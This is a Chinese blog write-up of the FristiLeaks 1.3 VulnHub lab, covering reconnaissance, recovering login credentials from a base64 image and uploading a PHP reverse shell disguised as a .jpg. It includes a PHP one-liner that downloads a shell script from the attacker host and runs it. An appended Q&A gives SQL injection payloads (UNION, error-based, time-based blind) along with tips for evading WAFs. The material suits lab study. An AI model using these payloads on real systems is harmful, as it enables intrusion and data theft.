靶机:FristiLeaks_1.3

最新推荐文章于 2025-10-09 15:54:26 发布
原创 最新推荐文章于 2025-10-09 15:54:26 发布 · 973 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#其他

本文详细记录了使用FristiLeaks_1.3.ova靶机进行渗透测试的过程,包括下载安装、环境配置、信息收集、Web漏洞利用、上传反弹shell木马等关键步骤。

下载连接
https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova.torrent https://download.vulnhub.com/fristilea
ks/FristiLeaks_1.3.ova
运行环境
Virtualbox (二选一) Vnware Workstation player
VMware用户将需要手动将VM的靶机的MAC地址编辑为:08:00:27:A5:A6:76
配置成功即可出现ip地址
这里我用的是nat模式
在这里插入图片描述
使用netdiscove -r 192.168.88.0/24
主要的主动模式,一般通过一个已知的IP来扫描一段IP
在这里插入图片描述
nmap发现只开放了80端口,所以细扫一下80端口
在这里插入图片描述
进入web站点,查看页面源码,在这里插入图片描述

好像是要在四小时内获取flag

根据nmap扫描结果存在robots.txt文件
在这里插入图片描述

访问三个路径,都是相同的图片
dib扫描下目录,发现http://192.168.88.138/images/
在这里插入图片描述
这张图片似乎是个提示,我们进入http://192.168.88.138/fristi/
在这里插入图片描述
一个登录窗口
在这里插入图片描述
查看页面源代码我们得知 页面是叫eezeepz的人留下的,那么那就有这种可能:他也许用eezeepz当做他的用户名或者密码。还有
超级leet密码登录测试页面。我们对图像使用base64编码,因此它们在HTML中是内联的。我在网上看到,这是一个很好的方法。
在这里插入图片描述
页面下方还有一个base64加密文档
在这里插入图片描述

将源代码下文的绿色字体复制进一个文件里
在这里插入图片描述
使用base64命令解码
在这里插入图片描述

根据文件格式,转换为png格式
在这里插入图片描述

在根目录下查看图片
在这里插入图片描述
试试 username:eezeepz password:keKkeKKeKKeKkEkkEk
不出所料,这个就是密码 登录
在这里插入图片描述
发现一个文件上传的功能点 这时我们要下载反弹shell的脚本木马
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
解压完成后
在这里插入图片描述

修改此php文件的目标IP地址和监听端口

在这里插入图片描述

开启监听
在这里插入图片描述

将其后缀加上.jpg,上传
在这里插入图片描述
上传成功
在这里插入图片描述
使用nv -nlvp 8888 监听发现监听不了
在这里插入图片描述
百度了好久,发现新办法
在Kali上写个PHP反弹shell的脚本;并开启Apache服务
在这里插入图片描述
service apache2 start

在物理机上写个下载并执行该脚本的PHP代码

<?php system("wget 192.168.88.135/shell.txt -O /tmp/shell.php; php /tmp/shell.php");?>

在这里插入图片描述
目前就做到这,以后再补

【vulnhub】---FristiLeaks_1.3靶机
qq_43168364的博客
08-22 1147
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机FristiLeaks: 1.3靶机(192.168.15.155) 攻击机:kali Linux(192.168.15.129) 相关设置 根据官网的提示这里需要给靶机设置MAC地址 设置好了之后就可以开心的玩耍了。 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:arp-scan -l 命令:netdiscover -i eth0 -r
FristiLeaks_1.3
cxyzupup的博客
01-10 872
FristiLeaks_1.3 项目地址:https://www.vulnhub.com/entry/fristileaks-13,133/ 提示: (1靶机网络连接方式使用NAT模式 (2)该靶机做了地址绑定,因此需要设置固定物理地址才能获取IP地址;物理地址为:08:00:27:A5:A6:76 文章目录FristiLeaks_1.3一、信息收集1. 使用nmap收集端口服务信息:2. 查看tcp80端口:3. 使用gobuster工具对http服务进行枚举:3.1 查看/images目录:3.2 查
VulnHub-FRISTILEAKS 1.3
热门推荐
江左盟的博客
12-02 1万+
简介 这是一台CTF类的靶机,比较考验脑洞,我个人不大喜欢,能想到作者的设计的点会觉得简单,想不到就觉得难。该靶机通过网页源码获取登录用户名和密码,然后利用Apache解析漏洞获取服务器权限,可利用脏牛直接提升至root用户权限,也可利用计划任务先获取admin用户权限,然后解密密文获得fristigod用户登录密码,最后利用SUID程序提升至root权限。 靶机下载地址:https://www.vulnhub.com/entry/fristileaks-13,133/ 信息收集 使用nmap --min-
2025最新渗透测试靶场推荐
最新发布
小司机的奥拓
10-09 549
网址:https://www.cyberstrikelab.com/CyberStrikeLab 是一个专注于网络安全的在线仿真实战平台,由经验丰富的红队人员打造,以实战、系统、便利为特色,其靶机根据多年实战案例搭建,能帮助学习者提升网络安全实战技能。网址:https://app.hackthebox.com/Hack The Box 是一个国际知名的网络安全渗透测试实战靶场平台,提供在线的渗透测试环境与挑战,帮助网络安全学习者与从业者提升实战技能。网址:https://hackmyvm.eu/
Vulnhub靶机FristiLeaks_1.3
qq_48904485的博客
03-19 1233
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机FristiLeaks 1.310.0.2.12)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/fristileaks-13,133/注意安装靶机的时候需要将靶机的MAC地址改为:08:00:27:A5:A6:76,否则靶机ip地址会获取不到。
vulnhub渗透系列之FristiLeaks: 1.3
来到了学渣的博客
02-06 2406
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 实验过程总结 1.靶机安装好后自动提示了IP地址,所以直接探测存活的端口就行,发现与以往不一样的是它只开放了80端口,nmap同时也扫出来cola/sisi/beer三个目录。 2.进入80端web页面,登录到cola/sisi/beer发现图片提示主要...
FristiLeaks_1.3#攻略
qq_27466929的博客
09-21 1218
FristiLeaks_1.3#攻略
vulnhub靶机渗透 FRISTILEAKS: 1.3
RestoreJustice的博客
03-18 399
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。冷静(fristi),这张图片就是首页的我们第二次看到再结合到上一张图片的提示,这张很有可能有提示。根据官网提供的说明,首先要将要求设置VMware虚拟机的MAC地址 08:00:27:A5:A6:76,然后开启VM。在图片中插入phpinfo和一句话木马,成功上传到 /uploads目录,根据前面的目录爆破可知上传路径。
5.100个渗透测试实战#5(FristiLeaks_1.3
qwsn
03-25 2936
目录 一、实验环境 二、实验流程 三、实验步骤 (一)信息收集——主机发现 1.查看kali的网卡和IP信息(网卡名:eth0,IP:192.168.97.129); 2.查看靶机页面; 3.探测特定网络内的主机存活状态(netdiscover、arp-scan、nmap); 4.分析所得; (二)信息收集——端口(服务)扫描; 1.扫描端口,以及端口对应的服务,以及靶机的运行...
FRISTILEAKS: 1.3打靶渗透【附代码】(权限提升)
网安学习
08-01 1153
FRISTILEAKS: 1.3打靶渗透【附代码】(权限提升)-脏牛提权、SUDO提权
【vulnhub】FristiLeaks_1.3靶机
weixin_62162207的博客
08-01 451
FristiLeaks_1.3靶机:打靶训练
Vulnhub 渗透练习(七)—— FRISTILEAKS: 1.3
shinygod的博客
02-19 654
仔细阅读一些留言或者是解释。可以利用漏洞探针快速查询漏洞。脏牛的简单利用,及影响版本。
Vulnhub-靶机-FristiLeaks 1.3
qq_43264813的博客
03-01 543
Vulnhub—靶机FristiLeaks 1.3 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 文章目录Vulnhub—靶机FristiLeaks 1.3一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址,对目标靶机进行全端口扫描: 【命令】nmap -n -p- 192.168
Vulnhub靶机渗透:FRISTILEAKS: 1.3
Mysmycbx的博客
05-27 2369
信息收集很难,需要总结
靶机渗透FristiLeaks1.3 ☀️新手详细☀️
君莫hacker的博客
09-08 8504
靶机FristiLeaks1.3的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘三、 漏洞利用四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/fristileaks-13,133/ 作者 Ar0xA 发布日期 2015年12月14日 难度 中等 靶机基本介绍: 一个小型虚拟机是为一个叫做Fristileaks的荷兰非正式黑客聚会而设计的。意味着可以在几个小时内完成,
VulnHub渗透测试实战靶场 - FRISTILEAKS: 1.3
LYJ20010728的博客
08-06 1570
VulnHub渗透测试实战靶场 - FRISTILEAKS: 1.3环境下载TOPHATSEC: FRESHLY靶机搭建渗透测试信息搜集漏洞挖掘 环境下载 戳此进行环境下载 TOPHATSEC: FRESHLY靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式,虚拟机的MAC地址为:08:00:27:A5:A6:76 获取到目标靶机的IP为:192.168.246.132 渗透测试 信息搜集 用Nmap扫描一下目标靶机:sudo nmap -sS -A 192.168.246.
FristiLeaks_1.3(0基础详解)
weixin_43433141的博客
12-22 897
1.将虚拟机导入到vm中,扫描获得此靶机的ip靶机ip为192.168.55.1392.进行端口扫描、目录枚举、指纹识别端口扫描:目录枚举:指纹识别:3.进入靶机网页查看信息发现网站没有什么信息目录枚举中有一个robots.txt可以尝试访问一下试试访问这个文件,发现有三个目录继续访问这三个目录,结果三个目录全部都是以下内容将目录枚举的url都打开,发现就这一个有用抽象靶机在主页的fristi里面藏了后台登录框尝试在输入框中sql注入,没用,然后再尝试查看网站源代码看看信息了。
FRISTILEAKS: 1.3超详细靶机实战
weixin_68615160的博客
08-01 1151
网卡设置为nat模式,并修改mac地址为开启虚拟机后IP地址在终端显示。
VulhubFristileaks靶机详解
weixin_62457642的博客
09-14 784
靶机Fristileaks速刷
二.实操题1(本大题共5小题,每小题4分,共20分) 请攻打对应的靶机获取对应的key。 1、http://10.1.12.100:81/ Key: ________________________________________ 2、http://10.1.12.100:82/ Key: ________________________________________ 3、http://10.1.12.100:83/ Key: ________________________________________ 4、http://10.1.12.100:84/ Key: ________________________________________ 5、http://10.1.12.100:85/ Key:
06-24
### 利用SQL注入技术从靶机中提取Key值 SQL注入是一种通过构造恶意输入来改变SQL查询逻辑的安全漏洞。攻击者可以利用这种漏洞从目标数据库中提取敏感信息,例如Key值。以下是实现此目标的详细方法。 #### 构造SQL注入Payload以提取Key值 假设目标系统存在类似以下的SQL查询: ```sql SELECT * FROM users WHERE id = &#39;user_input&#39;; ``` 攻击者可以通过构造以下Payload实现信息提取: ```plaintext 1&#39; UNION ALL SELECT concat_ws(&#39;~&#39;,table_name,column_name) FROM information_schema.columns WHERE table_schema=database() -- - ``` 这将导致生成的SQL查询变为: ```sql SELECT * FROM users WHERE id = &#39;1&#39; UNION ALL SELECT concat_ws(&#39;~&#39;,table_name,column_name) FROM information_schema.columns WHERE table_schema=database() -- -&#39;; ``` 上述查询使用了`UNION ALL SELECT`语句[^2],将原始查询与攻击者构造的新查询合并,同时利用`concat_ws()`函数将表名和列名组合输出。注释符号`-- -`用于忽略后续的SQL语法。 #### 使用报错注入技术提取Key值 如果目标系统未关闭数据库报错功能,可以利用报错注入技术直接获取Key值。例如,使用`extractvalue()`函数构造以下Payload: ```plaintext 1&#39; AND extractvalue(1,concat(0x3a,(SELECT key_value FROM key_table))) -- - ``` 这将触发数据库错误,并在错误消息中回显Key值[^1]。 #### 时间盲注技术提取Key值 如果目标系统既无回显也无报错,可以使用时间盲注技术逐位提取Key值。例如,构造以下Payload: ```plaintext 1&#39; AND IF(SUBSTRING((SELECT key_value FROM key_table),1,1)=&#39;A&#39;,SLEEP(5),0) -- - ``` 如果条件成立,查询将延迟5秒执行,从而推断出Key值的每一位[^4]。 #### 代码示例 以下是一个可能的时间盲注Payload示例: ```python for i in range(1, len_key + 1): for char in possible_chars: payload = f"1&#39; AND IF(SUBSTRING((SELECT key_value FROM key_table),{i},1)=&#39;{char}&#39;,SLEEP(5),0) -- -" # 发送请求并测量响应时间 if response_time > 5: key += char break ``` #### 注意事项 为了确保攻击成功,需要注意以下几点: - 确保目标系统使用的数据库是MySQL,并且版本支持相关函数。 - 如果文件路径中包含特殊字符,需进行适当的URL编码。 - 避免触发WAF(Web应用防火墙)或IPS(入侵防御系统)的检测。 #### 防护措施 为了防止SQL注入漏洞,建议采取以下措施: - 使用参数化查询或预编译语句,避免直接拼接用户输入[^4]。 - 对所有输入数据进行严格验证和转义。 - 禁止数据库用户拥有不必要的高权限。
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值